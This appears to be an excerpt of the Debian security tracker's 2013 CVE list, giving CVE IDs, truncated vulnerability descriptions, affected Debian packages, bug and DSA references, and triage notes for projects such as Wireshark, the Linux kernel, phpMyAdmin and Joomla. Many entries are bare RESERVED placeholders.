CVE-2013-3562 [wireshark: Websocket dissector crash] - wireshark (bug #709167) TODO: check NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8499 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-29.html CVE-2013-3561 [wirehark: Websocket dissector crash] - wireshark (bug #709167) TODO: check NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8448 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-29.html CVE-2013-3560 [wireshark: MPEG DSM-CC dissector crash] - wireshark (bug #709167) TODO: check NOTE: http://www.wireshark.org/security/wnpa-sec-2013-28.html CVE-2013-3559 [wireshark: DCP ETSI dissector crash] - wireshark (bug #709167) TODO: check NOTE: http://www.wireshark.org/security/wnpa-sec-2013-27.html CVE-2013-3558 [wireshark: PPP CCP dissector crash] - wireshark (bug #709167) TODO: check NOTE: http://www.wireshark.org/security/wnpa-sec-2013-26.html CVE-2013-3557 [wireshark: ASN.1 BER dissector crash] - wireshark (bug #709167) TODO: check NOTE: http://www.wireshark.org/security/wnpa-sec-2013-25.html CVE-2013-3556 [wireshark: ASN.1 BER dissector crash] - wireshark (bug #709167) TODO: check NOTE: http://www.wireshark.org/security/wnpa-sec-2013-25.html CVE-2013-3555 [wireshark: GTPv2 dissector crash] - wireshark (bug #709167) TODO: check NOTE: http://www.wireshark.org/security/wnpa-sec-2013-24.html CVE-2013-3554 RESERVED CVE-2013-3553 RESERVED CVE-2013-3552 RESERVED CVE-2013-3551 RESERVED CVE-2013-XXXX [rrdtool: format string vulnerability] - rrdtool (bug #708866) CVE-2013-3550 RESERVED CVE-2013-3549 RESERVED CVE-2013-3548 RESERVED CVE-2013-3547 RESERVED CVE-2013-3546 RESERVED CVE-2013-3545 RESERVED CVE-2013-3544 RESERVED CVE-2013-3543 RESERVED CVE-2013-3542 RESERVED CVE-2013-3541 RESERVED CVE-2013-3540 RESERVED CVE-2013-3539 RESERVED CVE-2013-3538 (Multiple cross-site scripting (XSS) vulnerabilities in todooforum.php ...) NOT-FOR-US: Todoo Forum CVE-2013-3537 (Multiple SQL injection vulnerabilities in todooforum.php in Todoo ...) 
NOT-FOR-US: Todoo Forum CVE-2013-3536 (SQL injection vulnerability in the gp_LoadUserFromHash function in ...) NOT-FOR-US: grouppay plugin CVE-2013-3535 (Multiple cross-site scripting (XSS) vulnerabilities in CMSLogik 1.2.0 ...) NOT-FOR-US: CMSLogik CVE-2013-3534 (Cross-site scripting (XSS) vulnerability in the aiContactSafe ...) NOT-FOR-US: aiContactSafe CVE-2013-3533 (Multiple SQL injection vulnerabilities in Virtual Access Monitor ...) NOT-FOR-US: Virtual Access Monitor CVE-2013-3532 (SQL injection vulnerability in settings.php in the Web Dorado Spider ...) NOT-FOR-US: WordPress plugin CVE-2013-3531 (SQL injection vulnerability in meneger.php in RadioCMS 2.2 allows ...) NOT-FOR-US: RadioCMS CVE-2013-3530 (SQL injection vulnerability in playlist.php in the Spiffy XSPF Player ...) NOT-FOR-US: WordPress plugin CVE-2013-3529 (Multiple cross-site scripting (XSS) vulnerabilities in user/obits.php ...) NOT-FOR-US: WordPress plugin CVE-2013-3528 (Unspecified vulnerability in the update check in Vanilla Forums before ...) NOT-FOR-US: Vanilla Forums CVE-2013-3527 (Multiple SQL injection vulnerabilities in Vanilla Forums before ...) NOT-FOR-US: Vanilla Forums CVE-2013-3526 (Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the ...) NOT-FOR-US: WordPress plugin CVE-2013-3525 (** DISPUTED ** ...) NOTE: http://blog.bestpractical.com/2013/04/on-our-security-policies.html CVE-2013-3524 (SQL injection vulnerability in popupnewsitem/ in the Pop Up News ...) NOT-FOR-US: phpVMS CVE-2013-3523 (SQL injection vulnerability in This HTML Is Simple (THIS) before 1.2.4 ...) NOT-FOR-US: This HTML Is Simple CVE-2013-3522 (SQL injection vulnerability in index.php/ajax/api/reputation/vote in ...) NOT-FOR-US: vBulletin CVE-2012-6552 (Unspecified vulnerability in admin/action.php in phpVMS 2.1.x before ...) 
NOT-FOR-US: phpVMS CVE-2013-3521 RESERVED CVE-2013-3520 RESERVED CVE-2013-3519 RESERVED CVE-2013-3518 RESERVED CVE-2013-3517 RESERVED CVE-2013-3516 RESERVED CVE-2013-3515 RESERVED CVE-2013-3514 RESERVED CVE-2013-3513 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Noma ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3512 (The Cacti component in GroundWork Monitor Enterprise 6.7.0 does not ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3511 (Open redirect vulnerability in the NeDi component in GroundWork ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3510 (Multiple SQL injection vulnerabilities in GroundWork Monitor ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3509 (html/System-NeDi.php in the NeDi component in GroundWork Monitor ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3508 (html/System-Files.php in the System File Overview feature in the NeDi ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3507 (The NeDi component in GroundWork Monitor Enterprise 6.7.0 allows ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3506 (cgi-bin/performance/perfchart.cgi in the Performance component in ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3505 (The Nagios-App component in GroundWork Monitor Enterprise 6.7.0 allows ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3504 (Directory traversal vulnerability in monarch.cgi in the MONARCH ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3503 (The Profile Importer feature in monarch.cgi in the MONARCH component ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3502 (monarch_scan.cgi in the MONARCH component in GroundWork Monitor ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3501 (Multiple cross-site scripting (XSS) vulnerabilities in GroundWork ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3500 (The Foundation webapp admin interface in GroundWork Monitor Enterprise ...) 
NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3499 (GroundWork Monitor Enterprise 6.7.0 performs authentication on the ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3498 (Cross-site scripting (XSS) vulnerability in Juniper SmartPass WLAN ...) NOT-FOR-US: Juniper CVE-2013-3497 (Juniper Junos Space before 12.3P2.8, as used on the JA1500 appliance ...) NOT-FOR-US: Juniper CVE-2013-3496 RESERVED CVE-2013-3495 RESERVED CVE-2013-3494 RESERVED CVE-2013-3493 RESERVED CVE-2013-3492 RESERVED CVE-2013-3491 RESERVED CVE-2013-3490 RESERVED CVE-2013-3489 RESERVED CVE-2013-3488 RESERVED CVE-2013-3487 RESERVED CVE-2013-3486 RESERVED CVE-2013-3485 RESERVED CVE-2013-3484 RESERVED CVE-2013-3483 RESERVED CVE-2013-3482 RESERVED CVE-2013-3481 RESERVED CVE-2013-3480 RESERVED CVE-2013-3479 RESERVED CVE-2013-3478 RESERVED CVE-2013-3477 RESERVED CVE-2013-3476 RESERVED CVE-2013-3475 RESERVED CVE-2013-3474 RESERVED CVE-2013-3473 RESERVED CVE-2013-3472 RESERVED CVE-2013-3471 RESERVED CVE-2013-3470 RESERVED CVE-2013-3469 RESERVED CVE-2013-3468 RESERVED CVE-2013-3467 RESERVED CVE-2013-3466 RESERVED CVE-2013-3465 RESERVED CVE-2013-3464 RESERVED CVE-2013-3463 RESERVED CVE-2013-3462 RESERVED CVE-2013-3461 RESERVED CVE-2013-3460 RESERVED CVE-2013-3459 RESERVED CVE-2013-3458 RESERVED CVE-2013-3457 RESERVED CVE-2013-3456 RESERVED CVE-2013-3455 RESERVED CVE-2013-3454 RESERVED CVE-2013-3453 RESERVED CVE-2013-3452 RESERVED CVE-2013-3451 RESERVED CVE-2013-3450 RESERVED CVE-2013-3449 RESERVED CVE-2013-3448 RESERVED CVE-2013-3447 RESERVED CVE-2013-3446 RESERVED CVE-2013-3445 RESERVED CVE-2013-3444 RESERVED CVE-2013-3443 RESERVED CVE-2013-3442 RESERVED CVE-2013-3441 RESERVED CVE-2013-3440 RESERVED CVE-2013-3439 RESERVED CVE-2013-3438 RESERVED CVE-2013-3437 RESERVED CVE-2013-3436 RESERVED CVE-2013-3435 RESERVED CVE-2013-3434 RESERVED CVE-2013-3433 RESERVED CVE-2013-3432 RESERVED CVE-2013-3431 RESERVED CVE-2013-3430 RESERVED CVE-2013-3429 RESERVED CVE-2013-3428 RESERVED CVE-2013-3427 RESERVED 
CVE-2013-3426 RESERVED CVE-2013-3425 RESERVED CVE-2013-3424 RESERVED CVE-2013-3423 RESERVED CVE-2013-3422 RESERVED CVE-2013-3421 RESERVED CVE-2013-3420 RESERVED CVE-2013-3419 RESERVED CVE-2013-3418 RESERVED CVE-2013-3417 RESERVED CVE-2013-3416 RESERVED CVE-2013-3415 RESERVED CVE-2013-3414 RESERVED CVE-2013-3413 RESERVED CVE-2013-3412 RESERVED CVE-2013-3411 RESERVED CVE-2013-3410 RESERVED CVE-2013-3409 RESERVED CVE-2013-3408 RESERVED CVE-2013-3407 RESERVED CVE-2013-3406 RESERVED CVE-2013-3405 RESERVED CVE-2013-3404 RESERVED CVE-2013-3403 RESERVED CVE-2013-3402 RESERVED CVE-2013-3401 RESERVED CVE-2013-3400 RESERVED CVE-2013-3399 RESERVED CVE-2013-3398 RESERVED CVE-2013-3397 RESERVED CVE-2013-3396 RESERVED CVE-2013-3395 RESERVED CVE-2013-3394 RESERVED CVE-2013-3393 RESERVED CVE-2013-3392 RESERVED CVE-2013-3391 RESERVED CVE-2013-3390 RESERVED CVE-2013-3389 RESERVED CVE-2013-3388 RESERVED CVE-2013-3387 RESERVED CVE-2013-3386 RESERVED CVE-2013-3385 RESERVED CVE-2013-3384 RESERVED CVE-2013-3383 RESERVED CVE-2013-3382 RESERVED CVE-2013-3381 RESERVED CVE-2013-3380 RESERVED CVE-2013-3379 RESERVED CVE-2013-3378 RESERVED CVE-2013-3377 RESERVED CVE-2013-3376 RESERVED CVE-2013-3375 RESERVED CVE-2013-3374 RESERVED CVE-2013-3373 RESERVED CVE-2013-3372 RESERVED CVE-2013-3371 RESERVED CVE-2013-3370 RESERVED CVE-2013-3369 RESERVED CVE-2013-3368 RESERVED CVE-2013-3367 RESERVED CVE-2013-3366 RESERVED CVE-2013-3365 RESERVED CVE-2013-3364 RESERVED CVE-2013-3363 RESERVED CVE-2013-3362 RESERVED CVE-2013-3361 RESERVED CVE-2013-3360 RESERVED CVE-2013-3359 RESERVED CVE-2013-3358 RESERVED CVE-2013-3357 RESERVED CVE-2013-3356 RESERVED CVE-2013-3355 RESERVED CVE-2013-3354 RESERVED CVE-2013-3353 RESERVED CVE-2013-3352 RESERVED CVE-2013-3351 RESERVED CVE-2013-3350 RESERVED CVE-2013-3349 RESERVED CVE-2013-3348 RESERVED CVE-2013-3347 RESERVED CVE-2013-3346 RESERVED CVE-2013-3345 RESERVED CVE-2013-3344 RESERVED CVE-2013-3343 RESERVED CVE-2013-3342 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x 
before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-3341 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-3340 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-3339 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-3338 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-3337 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-3336 (Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-3335 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3334 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3333 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3332 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3331 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3330 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3329 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3328 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3327 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3326 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3325 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) 
NOT-FOR-US: Adobe Flash CVE-2013-3324 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3323 RESERVED CVE-2013-3322 RESERVED CVE-2013-3321 RESERVED CVE-2013-3320 RESERVED CVE-2013-3319 RESERVED CVE-2013-3318 RESERVED CVE-2013-3317 RESERVED CVE-2013-3316 RESERVED CVE-2013-3315 RESERVED CVE-2013-3314 RESERVED CVE-2013-3313 RESERVED CVE-2013-3312 RESERVED CVE-2013-3311 RESERVED CVE-2013-3310 RESERVED CVE-2009-5135 (The Java XML parser in Echo before 2.1.1 and 3.x before 3.0.b6 allows ...) NOT-FOR-US: Echo CVE-2013-3309 RESERVED CVE-2013-3308 RESERVED CVE-2013-3307 RESERVED CVE-2013-3306 RESERVED CVE-2013-3305 RESERVED CVE-2013-3304 RESERVED CVE-2013-3303 RESERVED CVE-2013-XXXX [automysqlbackup code injection] - automysqlbackup 2.6+debian.3-1 (bug #706099) CVE-2013-XXXX [autopostgresqlbackup code injection] - autopostgresqlbackup 1.0-2 (bug #706095) CVE-2013-3300 RESERVED CVE-2013-3299 RESERVED CVE-2013-3298 RESERVED CVE-2013-3297 RESERVED CVE-2013-3296 RESERVED CVE-2013-3295 RESERVED CVE-2013-3294 RESERVED CVE-2013-3293 RESERVED CVE-2013-3292 RESERVED CVE-2013-3291 RESERVED CVE-2013-3290 RESERVED CVE-2013-3289 RESERVED CVE-2013-3288 RESERVED CVE-2013-3287 RESERVED CVE-2013-3286 RESERVED CVE-2013-3285 RESERVED CVE-2013-3284 RESERVED CVE-2013-3283 RESERVED CVE-2013-3282 RESERVED CVE-2013-3281 RESERVED CVE-2013-3280 RESERVED CVE-2013-3279 RESERVED CVE-2013-3278 RESERVED CVE-2013-3277 RESERVED CVE-2013-3276 RESERVED CVE-2013-3275 RESERVED CVE-2013-3274 RESERVED CVE-2013-3273 RESERVED CVE-2013-3272 RESERVED CVE-2013-3271 RESERVED CVE-2013-3270 (EMC VNX Control Station before 7.1.70.2 and Celerra Control Station ...) NOT-FOR-US: EMC CVE-2013-3302 (Race condition in the smb_send_rqst function in fs/cifs/transport.c in ...) - linux-2.6 (Introduced in 3.7) - linux [wheezy] - linux (Introduced in 3.7) CVE-2013-3301 (The ftrace implementation in the Linux kernel before 3.8.8 allows ...) 
{DSA-2669-1} - linux-2.6 (low) - linux 3.8.11-1 (low) NOTE: https://git.kernel.org/linus/6a76f8c0ab19f215af2a3442870eeb5f0e81998d NOTE: Not enabled in default kernels CVE-2013-3269 (Cross-site request forgery (CSRF) vulnerability in Cybozu Office ...) NOT-FOR-US: Cybozu Office CVE-2013-3268 (Novell iManager 2.7 before SP6 Patch 1 does not refresh a token after ...) NOT-FOR-US: Novell iManager CVE-2013-3267 (Cross-site scripting (XSS) vulnerability in the highlighter plugin in ...) - joomla (bug #571794) CVE-2013-3266 (The nfsrvd_readdir function in sys/fs/nfsserver/nfs_nfsdport.c in the ...) - kfreebsd-9 9.0-11 (bug #706414) - kfreebsd-8 (bug #706418) NOTE: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:05.nfsserver.asc CVE-2013-3265 RESERVED CVE-2013-3264 RESERVED CVE-2013-3263 RESERVED CVE-2013-3262 RESERVED CVE-2013-3261 RESERVED CVE-2013-3260 RESERVED CVE-2013-3259 RESERVED CVE-2013-3258 RESERVED CVE-2013-3257 RESERVED CVE-2013-3256 RESERVED CVE-2013-3255 RESERVED CVE-2013-3254 (Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in the ...) NOT-FOR-US: WordPress plugin CVE-2013-3253 RESERVED CVE-2013-3252 RESERVED CVE-2013-3251 RESERVED CVE-2013-3250 RESERVED CVE-2013-3249 RESERVED CVE-2013-3248 RESERVED CVE-2013-3247 RESERVED CVE-2013-3246 RESERVED CVE-2013-3245 RESERVED CVE-2013-3244 RESERVED CVE-2013-3243 RESERVED CVE-2013-3242 (plugins/system/remember/remember.php in Joomla! 2.5.x before 2.5.10 ...) - joomla (bug #571794) CVE-2013-3241 (export.php (aka the export script) in phpMyAdmin 4.x before 4.0.0-rc3 ...) - phpmyadmin (Vulnerable code not present) CVE-2013-3240 (Directory traversal vulnerability in the Export feature in phpMyAdmin ...) - phpmyadmin (Vulnerable code not present) CVE-2013-3239 (phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir ...) 
- phpmyadmin 4:3.4.11.1-2 [squeeze] - phpmyadmin (Minor issue) NOTE: Requires non-default option saveDir to be enabled, an authenticated untrusted user and Apache mod_mime CVE-2013-3238 (phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3 allows remote ...) - phpmyadmin (exploitable PHP on Windows only) NOTE: code patched in 4:3.4.11.1-2 nonetheless CVE-2013-3237 (The vsock_stream_sendmsg function in net/vmw_vsock/af_vsock.c in the ...) - linux-2.6 ((net/vmw_vsock/af_vsock.c not present) - linux (net/vmw_vsock/af_vsock.c not present) - open-vm-tools (low; bug #706557) [wheezy] - open-vm-tools (Minor information leak) [squeeze] - open-vm-tools (Contrib not supported, minor information leak) NOTE: open-vm-tools fixed in experimental with 2:9.2.2-893683-8 (update entry when unstable has the fix) CVE-2013-3236 (The vmci_transport_dgram_dequeue function in ...) - linux-2.6 (VM Sockets only introduced in 3.9-rc1) - linux (VM Sockets introduced in 3.9-rc1) CVE-2013-3235 (net/tipc/socket.c in the Linux kernel before 3.9-rc7 does not ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3234 (The rose_recvmsg function in net/rose/af_rose.c in the Linux kernel ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3233 (The llcp_sock_recvmsg function in net/nfc/llcp/sock.c in the Linux ...) - linux-2.6 (net/nfc/llcp/sock.c not present, introduced in 3.3) - linux (net/nfc/llcp/sock.c not present, introduced in 3.3) CVE-2013-3232 (The nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel ...) - linux-2.6 (Introduced and fixed during 3.9 cycle) - linux (Introduced and fixed during 3.9 cycle) CVE-2013-3231 (The llc_ui_recvmsg function in net/llc/af_llc.c in the Linux kernel ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3230 (The l2tp_ip6_recvmsg function in net/l2tp/l2tp_ip6.c in the Linux ...) 
- linux-2.6 (net/l2tp/l2tp_ip6.c not present) - linux (net/l2tp/l2tp_ip6.c introduced in 3.5) CVE-2013-3229 (The iucv_sock_recvmsg function in net/iucv/af_iucv.c in the Linux ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3228 (The irda_recvmsg_dgram function in net/irda/af_irda.c in the Linux ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3227 (The caif_seqpkt_recvmsg function in net/caif/caif_socket.c in the ...) {DSA-2669-1} - linux-2.6 (net/caif/caif_socket.c introduced in v2.6.35) - linux 3.8.11-1 (low) CVE-2013-3226 (The sco_sock_recvmsg function in net/bluetooth/sco.c in the Linux ...) - linux-2.6 (Vulnerable code not yet present) - linux (Vulnerable code not yet present) NOTE: sco_sock_recvmsg only introduced with v3.8, bt_sock_recvmsg has its own CVE ID CVE-2013-3225 (The rfcomm_sock_recvmsg function in net/bluetooth/rfcomm/sock.c in the ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3224 (The bt_sock_recvmsg function in net/bluetooth/af_bluetooth.c in the ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3223 (The ax25_recvmsg function in net/ax25/af_ax25.c in the Linux kernel ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3222 (The vcc_recvmsg function in net/atm/common.c in the Linux kernel ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3221 (The Active Record component in Ruby on Rails 2.3.x, 3.0.x, 3.1.x, and ...) 
- ruby-activerecord-3.2 (unimportant) - ruby-activerecord-2.3 (unimportant) - rails 2.3.14.1 (unimportant) NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: This is a general design problem and only mitigated by documented best practices CVE-2013-3220 RESERVED CVE-2013-3219 RESERVED CVE-2013-3218 RESERVED CVE-2013-3217 RESERVED CVE-2013-3216 RESERVED CVE-2013-3215 RESERVED CVE-2013-3214 RESERVED CVE-2013-3213 RESERVED CVE-2013-3212 RESERVED CVE-2012-6551 (The default configuration of Apache ActiveMQ before 5.8.0 enables a ...) - activemq (Example code not shipped in .deb) CVE-2013-3211 (Unspecified vulnerability in Opera before 12.15 has unknown impact and ...) NOT-FOR-US: Opera CVE-2013-3210 (Opera before 12.15 does not properly block top-level domains in ...) NOT-FOR-US: Opera CVE-2013-3209 RESERVED CVE-2013-3208 RESERVED CVE-2013-3207 RESERVED CVE-2013-3206 RESERVED CVE-2013-3205 RESERVED CVE-2013-3204 RESERVED CVE-2013-3203 RESERVED CVE-2013-3202 RESERVED CVE-2013-3201 RESERVED CVE-2013-3200 RESERVED CVE-2013-3199 RESERVED CVE-2013-3198 RESERVED CVE-2013-3197 RESERVED CVE-2013-3196 RESERVED CVE-2013-3195 RESERVED CVE-2013-3194 RESERVED CVE-2013-3193 RESERVED CVE-2013-3192 RESERVED CVE-2013-3191 RESERVED CVE-2013-3190 RESERVED CVE-2013-3189 RESERVED CVE-2013-3188 RESERVED CVE-2013-3187 RESERVED CVE-2013-3186 RESERVED CVE-2013-3185 RESERVED CVE-2013-3184 RESERVED CVE-2013-3183 RESERVED CVE-2013-3182 RESERVED CVE-2013-3181 RESERVED CVE-2013-3180 RESERVED CVE-2013-3179 RESERVED CVE-2013-3178 RESERVED CVE-2013-3177 RESERVED CVE-2013-3176 RESERVED CVE-2013-3175 RESERVED CVE-2013-3174 RESERVED CVE-2013-3173 RESERVED CVE-2013-3172 RESERVED CVE-2013-3171 RESERVED CVE-2013-3170 RESERVED CVE-2013-3169 RESERVED CVE-2013-3168 RESERVED CVE-2013-3167 RESERVED CVE-2013-3166 RESERVED CVE-2013-3165 RESERVED CVE-2013-3164 RESERVED CVE-2013-3163 RESERVED CVE-2013-3162 RESERVED CVE-2013-3161 RESERVED CVE-2013-3160 RESERVED CVE-2013-3159 RESERVED CVE-2013-3158 
RESERVED CVE-2013-3157 RESERVED CVE-2013-3156 RESERVED CVE-2013-3155 RESERVED CVE-2013-3154 RESERVED CVE-2013-3153 RESERVED CVE-2013-3152 RESERVED CVE-2013-3151 RESERVED CVE-2013-3150 RESERVED CVE-2013-3149 RESERVED CVE-2013-3148 RESERVED CVE-2013-3147 RESERVED CVE-2013-3146 RESERVED CVE-2013-3145 RESERVED CVE-2013-3144 RESERVED CVE-2013-3143 RESERVED CVE-2013-3142 RESERVED CVE-2013-3141 RESERVED CVE-2013-3140 RESERVED CVE-2013-3139 RESERVED CVE-2013-3138 RESERVED CVE-2013-3137 RESERVED CVE-2013-3136 RESERVED CVE-2013-3135 RESERVED CVE-2013-3134 RESERVED CVE-2013-3133 RESERVED CVE-2013-3132 RESERVED CVE-2013-3131 RESERVED CVE-2013-3130 RESERVED CVE-2013-3129 RESERVED CVE-2013-3128 RESERVED CVE-2013-3127 RESERVED CVE-2013-3126 RESERVED CVE-2013-3125 RESERVED CVE-2013-3124 RESERVED CVE-2013-3123 RESERVED CVE-2013-3122 RESERVED CVE-2013-3121 RESERVED CVE-2013-3120 RESERVED CVE-2013-3119 RESERVED CVE-2013-3118 RESERVED CVE-2013-3117 RESERVED CVE-2013-3116 RESERVED CVE-2013-3115 RESERVED CVE-2013-3114 RESERVED CVE-2013-3113 RESERVED CVE-2013-3112 RESERVED CVE-2013-3111 RESERVED CVE-2013-3110 RESERVED CVE-2013-3109 RESERVED CVE-2013-3108 RESERVED CVE-2013-3107 (VMware vCenter Server 5.1 before Update 1, when anonymous LDAP binding ...) NOT-FOR-US: vCenter CVE-2013-3106 RESERVED CVE-2013-3105 RESERVED CVE-2013-3104 RESERVED CVE-2013-3103 RESERVED CVE-2013-3102 RESERVED CVE-2013-3101 RESERVED CVE-2013-3100 RESERVED CVE-2013-3099 RESERVED CVE-2013-3098 RESERVED CVE-2013-3097 RESERVED CVE-2013-3096 RESERVED CVE-2013-3095 RESERVED CVE-2013-3094 RESERVED CVE-2013-3093 RESERVED CVE-2013-3092 RESERVED CVE-2013-3091 RESERVED CVE-2013-3090 RESERVED CVE-2013-3089 RESERVED CVE-2013-3088 RESERVED CVE-2013-3087 RESERVED CVE-2013-3086 RESERVED CVE-2013-3085 RESERVED CVE-2013-3084 RESERVED CVE-2013-3083 RESERVED CVE-2013-3082 RESERVED CVE-2013-3081 RESERVED CVE-2013-3080 (VMware vCenter Server Appliance (vCSA) 5.1 before Update 1 allows ...) 
NOT-FOR-US: vCenter CVE-2013-3079 (VMware vCenter Server Appliance (vCSA) 5.1 before Update 1 allows ...) NOT-FOR-US: vCenter CVE-2013-3078 RESERVED CVE-2013-3077 RESERVED CVE-2013-3076 (The crypto API in the Linux kernel through 3.9-rc8 does not initialize ...) {DSA-2669-1} - linux 3.8.11-1 (low) - linux-2.6 (Vulnerable code not present) CVE-2013-3075 (Multiple buffer overflows in ActUWzd.dll 1.0.0.1 in Mitsubishi MX ...) NOT-FOR-US: Mitsubishi MX Component 3 CVE-2013-3074 RESERVED CVE-2013-3073 RESERVED CVE-2013-3072 RESERVED CVE-2013-3071 RESERVED CVE-2013-3070 RESERVED CVE-2013-3069 RESERVED CVE-2013-3068 RESERVED CVE-2013-3067 RESERVED CVE-2013-3066 RESERVED CVE-2013-3065 RESERVED CVE-2013-3064 RESERVED CVE-2013-3063 (SAP BASIS Communication Services 4.6B through 7.30 allows remote ...) NOT-FOR-US: SAP BASIS Communication Services CVE-2013-3062 (The CP_RC_TRANSACTION_CALL_BY_SET function in the Engineering ...) NOT-FOR-US: SAP CVE-2013-3061 (The ISHMED-PATRED_TRANSACT_RFCCALL function in the IS-H ...) NOT-FOR-US: SAP CVE-2013-3060 (The web console in Apache ActiveMQ before 5.8.0 does not require ...) - activemq (Web console not provided in Debian package, see #702670) CVE-2013-3059 (Cross-site scripting (XSS) vulnerability in the Voting plugin in ...) - joomla (bug #571794) CVE-2013-3058 (Cross-site scripting (XSS) vulnerability in Joomla! 2.5.x before ...) - joomla (bug #571794) CVE-2013-3057 (Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows remote ...) - joomla (bug #571794) CVE-2013-3056 (Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows remote ...) - joomla (bug #571794) CVE-2013-3055 (Lexmark Markvision Enterprise before 1.8 provides a diagnostic ...) NOT-FOR-US: Lexmark Markvision Enterprise CVE-2013-3054 RESERVED CVE-2013-3053 RESERVED CVE-2013-3052 RESERVED CVE-2013-3051 (The TrustZone kernel, when used in conjunction with a certain Motorola ...) 
NOT-FOR-US: TrustZone kernel CVE-2013-3050 (SQL injection vulnerability in ZAPms 1.41 and earlier allows remote ...) NOT-FOR-US: ZAPms CVE-2013-3049 RESERVED CVE-2013-3048 RESERVED CVE-2013-3047 RESERVED CVE-2013-3046 RESERVED CVE-2013-3045 RESERVED CVE-2013-3044 RESERVED CVE-2013-3043 RESERVED CVE-2013-3042 RESERVED CVE-2013-3041 RESERVED CVE-2013-3040 RESERVED CVE-2013-3039 RESERVED CVE-2013-3038 RESERVED CVE-2013-3037 RESERVED CVE-2013-3036 RESERVED CVE-2013-3035 RESERVED CVE-2013-3034 RESERVED CVE-2013-3033 RESERVED CVE-2013-3032 RESERVED CVE-2013-3031 RESERVED CVE-2013-3030 RESERVED CVE-2013-3029 RESERVED CVE-2013-3028 RESERVED CVE-2013-3027 RESERVED CVE-2013-3026 RESERVED CVE-2013-3025 RESERVED CVE-2013-3024 RESERVED CVE-2013-3023 RESERVED CVE-2013-3022 RESERVED CVE-2013-3021 RESERVED CVE-2013-3020 RESERVED CVE-2013-3019 RESERVED CVE-2013-3018 RESERVED CVE-2013-3017 RESERVED 